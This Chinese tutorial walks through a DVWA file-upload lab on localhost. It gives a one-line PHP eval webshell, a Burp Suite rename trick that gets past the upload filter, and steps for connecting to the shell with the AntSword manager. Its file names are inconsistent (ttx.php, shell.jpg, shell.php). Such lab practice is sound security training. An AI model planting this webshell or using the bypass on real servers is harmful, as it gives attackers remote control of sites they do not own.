之前:需要打开phpstudy的靶场环境
第一步
➊准备木马文件 新建木马文件ttx.php,文件内容为
<?php @eval($_REQUEST["shell"]); ?>
➋保存后,将文件后缀名php改为jpg
➌登录dvwa测试环境,将security等级改为‘low’(其它模式,后端也做了校验,无法完成第⑤步的操作),然后打开文件上传模块
➍上传文件,选择第②步保存的shell.jpg,在点击‘Upload’之前,打开burpsuite拦截功能并且点击‘Upload’,在burpsuite中看到拦截的请求,将文件名修改为为shell.php后,放包
➎在文件上传处发现提示上传成功
➏使用工具,蚁剑shell管理工具
操作如下,填写添加url(第4步上传的ttx.php文件路径)http://127.0.0.1/DVWA-master/hackable/uploads/shell.php 填写连接密码(第①步php文件中双引号的内容)shell 其它默认设置,然后点击测试连接
,提示连接成功,点击‘添加
’或‘保存
’,完成
➐已经获取了web的权限,可以使用蚁剑的其它功能做更多的操作